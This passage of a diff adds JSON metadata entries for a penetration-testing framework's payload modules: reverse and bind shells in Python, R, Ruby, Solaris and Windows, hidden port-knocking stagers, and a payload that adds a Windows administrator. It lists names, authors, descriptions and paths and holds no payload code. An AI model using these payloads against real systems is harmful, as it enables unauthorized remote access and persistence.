"/modules/payloads/singles/python/shell_reverse_sctp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via python)", + "fullname": "payload/python/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Campbell " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_tcp_ssl": { + "name": "Command Shell, Reverse TCP SSL (via python)", + "fullname": "payload/python/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_python/shell_reverse_udp": { + "name": "Command Shell, Reverse UDP (via python)", + "fullname": "payload/python/shell_reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", + "references": [], + "platform": "Python", + "arch": "python", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/python/shell_reverse_udp.rb", + "is_install_path": true, + "ref_name": "python/shell_reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_r/shell_bind_tcp": { + "name": "R Command Shell, Bind TCP", + "fullname": "payload/r/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Continually listen for a connection and spawn a command shell via R", + "references": [], + "platform": "R", + "arch": "r", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/r/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "r/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_r/shell_reverse_tcp": { + "name": "R Command Shell, Reverse TCP", + "fullname": "payload/r/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via R", + "references": [], + "platform": "R", + "arch": "r", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/r/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "r/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/pingback_bind_tcp": { + "name": "Ruby Pingback, Bind TCP", + "fullname": "payload/ruby/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Listens for a connection from the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 19:02:28 +0000", + "path": "/modules/payloads/singles/ruby/pingback_bind_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/pingback_reverse_tcp": { + "name": "Ruby Pingback, Reverse TCP", + "fullname": "payload/ruby/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "asoto-r7" + ], + "description": "Connect back to the attacker, sends a UUID, then terminates", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 19:02:28 +0000", + "path": "/modules/payloads/singles/ruby/pingback_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_bind_tcp": { + "name": "Ruby Command Shell, Bind TCP", + "fullname": "payload/ruby/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_bind_tcp_ipv6": { + "name": "Ruby Command Shell, Bind TCP IPv6", + "fullname": "payload/ruby/shell_bind_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Continually listen for a connection and spawn a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "ruby/shell_bind_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_reverse_tcp": { + "name": "Ruby Command Shell, Reverse TCP", + "fullname": "payload/ruby/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "kris katterjohn ", + "hdm " + ], + "description": "Connect back and create a command shell via Ruby", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "ruby/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_ruby/shell_reverse_tcp_ssl": { + "name": "Ruby Command Shell, Reverse TCP SSL", + "fullname": "payload/ruby/shell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Connect back and create a command shell via Ruby, uses SSL", + "references": [], + "platform": "Ruby", + "arch": "ruby", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "ruby/shell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_bind_tcp": { + "name": "Solaris Command Shell, Bind TCP Inline", + "fullname": "payload/solaris/sparc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_find_port": { + "name": "Solaris Command Shell, Find Port Inline", + "fullname": "payload/solaris/sparc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/sparc/shell_reverse_tcp": { + "name": "Solaris Command Shell, Reverse TCP Inline", + "fullname": "payload/solaris/sparc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "vlad902 " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "sparc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/sparc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_bind_tcp": { + "name": "Solaris Command Shell, Bind TCP Inline", + "fullname": "payload/solaris/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_find_port": { + "name": "Solaris Command Shell, Find Port Inline", + "fullname": "payload/solaris/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Solaris", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_solaris/x86/shell_reverse_tcp": { + "name": "Solaris Command Shell, Reverse TCP Inline", + "fullname": "payload/solaris/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Solaris", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "solaris/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_tty/unix/interact": { + "name": "Unix TTY, Interact with Established Connection", + "fullname": "payload/tty/unix/interact", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm " + ], + "description": "Interacts with a TTY on an established socket connection", + "references": [], + "platform": "Unix", + "arch": "tty", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/tty/unix/interact.rb", + "is_install_path": true, + "ref_name": "tty/unix/interact", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/adduser": { + "name": "Windows Execute net user /ADD", + "fullname": "payload/windows/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "hdm ", + "Chris John Riley", + "vlad902 ", + "sf " + ], + "description": "Create a new user and add them to local administration group.\n\n Note: The specified password is checked for common complexity\n requirements to prevent the target machine rejecting the user\n for failing to meet policy requirements.\n\n Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/windows/adduser.rb", + "is_install_path": true, + "ref_name": "windows/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_windows/custom/bind_hidden_ipknock_tcp": { + "name": "Windows shellcode stage, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/windows/custom/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_windows/custom/bind_hidden_tcp": { + "name": "Windows shellcode stage, Hidden Bind TCP Stager", + "fullname": "payload/windows/custom/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "Borja Merino " + ], + "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_windows/custom/bind_ipv6_tcp": { + "name": "Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/windows/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_windows/custom/bind_ipv6_tcp_uuid": { + "name": "Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/custom/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_windows/custom/bind_named_pipe": { + "name": "Windows shellcode stage, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/windows/custom/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "UserExistsError" + ], + "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_windows/custom/bind_nonx_tcp": { + "name": "Windows shellcode stage, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "vlad902 " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_windows/custom/bind_tcp": { + "name": "Windows shellcode stage, Bind TCP Stager (Windows x86)", + "fullname": "payload/windows/custom/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp" + }, + "payload_windows/custom/bind_tcp_rc4": { + "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/windows/custom/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf ", + "mihi", + "RageLtMan" + ], + "description": "Custom shellcode stage.\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_windows/custom/bind_tcp_uuid": { + "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/windows/custom/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", + "is_install_path": true, + "ref_name": "windows/custom/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_windows/custom/find_tag": { + "name": "Windows shellcode stage, Find Tag Ordinal Stager", + "fullname": "payload/windows/custom/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "skape " + ], + "description": "Custom shellcode stage.\n\nUse an established connection", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/findtag_ord.rb", + "is_install_path": true, + "ref_name": "windows/custom/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/findtag_ord" + }, + "payload_windows/custom/reverse_http": { + "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/windows/custom/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http" + }, + "payload_windows/custom/reverse_http_proxy_pstore": { + "name": "Windows shellcode stage, Reverse HTTP Stager Proxy", + "fullname": "payload/windows/custom/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTP", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_windows/custom/reverse_https": { + "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)", + "fullname": "payload/windows/custom/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm " + ], + "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_https.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_https" + }, + "payload_windows/custom/reverse_ipv6_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)", + "fullname": "payload/windows/custom/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "hdm ", + "skape ", + "sf " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_windows/custom/reverse_named_pipe": { + "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager", + "fullname": "payload/windows/custom/reverse_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "OJ Reeves" + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_named_pipe" + }, + "payload_windows/custom/reverse_nonx_tcp": { + "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + "vlad902 " + ], + "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)", + "references": [], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", + "is_install_path": true, + "ref_name": "windows/custom/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "windows/custom", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_windows/custom/reverse_ord_tcp": { + "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/windows/custom/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bwatters-r7", + 